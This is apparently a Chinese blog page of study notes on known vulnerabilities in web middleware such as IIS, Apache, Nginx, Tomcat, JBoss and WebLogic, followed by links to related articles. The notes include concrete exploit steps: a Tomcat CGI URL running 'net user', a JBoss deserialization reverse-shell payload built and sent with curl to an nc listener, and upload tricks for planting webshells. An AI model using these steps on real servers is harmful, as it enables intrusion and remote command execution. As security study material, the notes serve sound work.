之前看吐司别人发的个文档,简单记的笔记
-----
IIS
    解析漏洞
       IIS 6
           *.asp;.jpg会被当作asp解析
           *.asp/目录下的文件会被当作asp解析
           asa cdx cer后缀也会被当作asp解析
       IIS 7
           在Fast-CGI时,test.jpg在url后加/.php即可解析成php文件
    PUT任意文件写入
       开启了WebDAV并允许写入
    IIS短文件漏洞
    CVE-2017-7269
       2003 r2 IIS 6 开启WebDAV
Apache
    解析漏洞
       未知扩展名解析漏洞
           1.php.xxx
       AddHandler导致的解析漏洞
           如果有"AddHandler application/x-httpd-php .php",只要有.php后缀即可a.php.jpg
       HTTPD换行解析漏洞 CVE-2017-15715
           影响2.4.0-2.4.29
           上传时文件名为phpinfo.php换行符,访问/phpinfo.php%0a
Nginx
    Nginx配置文件错误导致的解析漏洞
       info.jpg/1.php
    Nginx空字节任意代码执行漏洞 0.5 0.6 0.7-0.7.65 0.8-0.8.37
       webshell名为a.jpg 访问a.jpg空字节.php
    Nginx文件名逻辑漏洞 0.8.41-1.4.3 1.5.0-1.5.7
       上传时为a.jpg空格,访问a.jpg空格空字节.php
    Nginx配置错误导致的安全问题
       目录穿越
           在配置别名时,忘记加/   访问/files../
location /files {
   autoindex on;
   alias c:/WWW/home/;
}
        目录遍历 autoindex 为on
Tomcat
    任意文件写入CVE-2017-12615
       conf/web.xml配置了readonly=false,可以往服务器PUT文件
    Tomcat远程代码执行 CVE-2019-0232
       9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93
随意上传lxhsec.bat
 
http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user
   Tomcat + 弱口令 && 后台getshell漏洞
   Tomcat manager App 暴力破解
JBoss 默认端口8080 9990
    JBoss 5/6 反序列化漏洞 CVE-2017-12149
       访问/invoker/readonly 返回500说明存在页面
利用工具:JavaDeserH2HC,我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:
   生成ReverseShellCommonsCollectionsHashMap.class
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
   生成ReverseShellCommonsCollectionsHashMap.ser
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.31.232:6666(ip是nc所在的ip)
   利用:
curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
    JBoss JMXInvokerServlet反序列化漏洞
       /invoker/JMXInvokerServlet
    JBoss EJBInvokerServlet反序列化漏洞
       /invoker/EJBInvokerServlet
    JBoss <=4.x JBossMQ JMS反序列化漏洞 CVE-2017-7504
       /jbossmq-httpil/HTTPServerILServlet
    Administration Console弱口令
       /admin-console/
    JMX Console未授权访问
       /jmx-console/
WebLogic 默认端口7001
    XMLDecoder反序列化漏洞 CVE-2017-10271 & CVE-2017-3506
       /wls-wsat/
    wls9_async_response,wls-wsat反序列化漏洞 CVE-2019-2725
       /_async/
       /wls-wsat/
    WLS Core Components反序列化漏洞 CVE-2018-2628
        通过t3协议触发
    WebLogic任意文件上传漏洞 CVE-2018-2894 10.3.6.0 12.1.3.0, 12.2.1.2, 12.2.1.3
       /ws_utc/config.do
    Weblogic SSRF漏洞 CVE-2014-4210 10.0.2.0, 10.3.6.0
       /uddiexplorer/SearchPublicRegistries.jsp
    Weblogic弱口令后台getshell
       /console
 
GlassFish 默认端口:8080(Web应用端口,即网站内容),4848(GlassFish管理中心)
     GlassFish Directory Traversal(CVE-2017-1000028)    
       %c0%af作为/ 直接访问/META-INF下的敏感文件
    GlassFish 后台Getshell    
 
 
WebSphere
   Java反序列化(CVE-2015-7450)
       访问8880端口
    弱口令后台getshell
       6/7版本,后台只需输入admin,无需密码即可登录 websphere/ websphere system/ manager
 

web中间件常见漏洞总结笔记的更多相关文章

  1. Web中间件 - 常见漏洞总结

    *文章来源:https://blog.egsec.cn/archives/472 *本文将主要说明:Web中间件常见漏洞的产生原因以及修复方案 什么是Web中间件? 百度百科是这样解释的:中间件是介于 ...

  2. Web中间件常见漏洞总结

    一.IIS中间组件: 1.PUT漏洞 2.短文件名猜解 3.远程代码执行 4.解析漏洞 二.Apache中间组件: 1.解析漏洞 2.目录遍历 三.Nginx中间组件: 1.文件解析 2.目录遍历 3 ...

  3. Web中间件常见漏洞

    IIS Internet Information Services--windows 解析漏洞 IIS 6.x 基于文件名:该版本默认会将 *.asp;.jpg 此种格式的文件名,当成 Asp 解析, ...

  4. Web安全常见漏洞修复建议

    转载地址:https://security.pingan.com/blog/17.html SQL注入 在服务器端要对所有的输入数据验证有效性. 在处理输入之前,验证所有客户端提供的数据,包括所有的参 ...

  5. web中间件

    0x00 Web中间件概述 通俗来说,中间件是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通.Apache的Tomcat.IBM公司的WebSphere.BEA公司的WebLogic ...

  6. 常见web中间件漏洞(一)IIS漏洞

    web中间件作为web安全的重要一块,经常会有人问balabala,虽然有很多已经人尽皆知并且基本不再构成威胁了,但是还是有必要说一下,了解历史,了解我们从哪里来 鉴于内容实在是太多,本来打算一起写完 ...

  7. 常见web中间件漏洞(四)Tomcat漏洞

    这部分好久没写了,继续更新web中间件漏洞思路整理(不复现) ,争取...整理完 前几篇指路链接: nginx: https://www.cnblogs.com/lcxblogs/p/13596239 ...

  8. web端常见安全漏洞测试结果分析-- appscan

    基于appscan测试结果分析: 一.XSS跨站脚本 指的是攻击者往Web页面里插入恶意html代码,通常是JavaScript编写的恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被 ...

  9. Web开发常见的几个漏洞解决方法 (转)

    基本上,参加的安全测试(渗透测试)的网站,可能或多或少存在下面几个漏洞:SQL注入漏洞.跨站脚本攻击漏洞.登陆后台管理页面.IIS短文件/文件夹漏洞.系统敏感信息泄露. 1.测试的步骤及内容 这些安全 ...

随机推荐

  1. xamarin开发的mac开发小工具集合

    兄弟们我拖控件拖到了mac系统去了, 工具上传到百度网盘,下载地址 链接:https://pan.baidu.com/s/1Q64zoRjE3u66jJnzF8rhww提取码:ljx2 这款工具我是用 ...

  2. 修复IScroll点击无效,增加scrollTo数值容错处理

    个人博客: https://chenjiahao.xyz ============== 最近半年都处于一个非常忙碌的状态,直到现在才有功夫腾出时间记录这段时间以来踩过的一个个坑. 今天先记录关于ISc ...

  3. B-概率论-贝叶斯决策

    目录 贝叶斯决策 一.贝叶斯决策理论 二.贝叶斯公式 2.1 从条件概率公式推导贝叶斯公式 2.2 从全概率公式推导贝叶斯公式 三.贝叶斯公式应用 更新.更全的<机器学习>的更新网站,更有 ...

  4. 移动端meta设置大全

    声明文档使用的字符编码:  <meta charset='utf-8'> 强制让文档与设备的宽度保持1:1,对页面设置不能进行缩放: <meta name="viewpor ...

  5. MakaJs:基于 React, Redux 的轻量级前端框架

    github: maka.js 留下您宝贵的STAR!谢谢 maka maka源于中文码咖,意为写代码的大咖 一眼即可看懂的前端框架,简约而不简单 1.安装 bash sudo npm i -g @m ...

  6. Qt+VC2010+glew环境安装配置

    Qt的源码及预编译安装包在 Qt Archive下载,http://download.qt.io/archive/qt/, 目前最新的是Qt5,其中和Qt4不同的是,Qt5多了个QOpenGLWidg ...

  7. HMLT clear 属性

    原文 : http://www.zhangxinxu.com/wordpress/2014/06/understand-css-clear-left-right-and-use/ clear 的四个值 ...

  8. [NOIp2018] luogu P5021 赛道修建

    我同学的歌 题目描述 你有一棵树,每条边都有权值 did_idi​.现在要修建 mmm 条赛道,一条赛道是一条连贯的链,且一条边至多出现在一条赛道里.一条赛道的长被定义为,组成这条赛道的边的权值之和. ...

  9. React+Antd+Antd-Img-Crop实现上传固定大小的裁剪头像或者图片(且可控制图片数量)

    见章知著 1024,程序员们节日快乐!本文主要讲述react配合antd以及react-img-crop第三方库实现一个可控的图片上传功能. 运行项目 需要具有node环境 第三方库安装 1.antd ...

  10. 5.Linux文件管理相关命令(下)

    1.文件管理之:联网下载文件(wget.curl).文件上传与下载(rz.sz) 1.wget命令 1.CentOS7 系统最小化安装默认没有wget命令,需要进行安装 [root@oldboyedu ...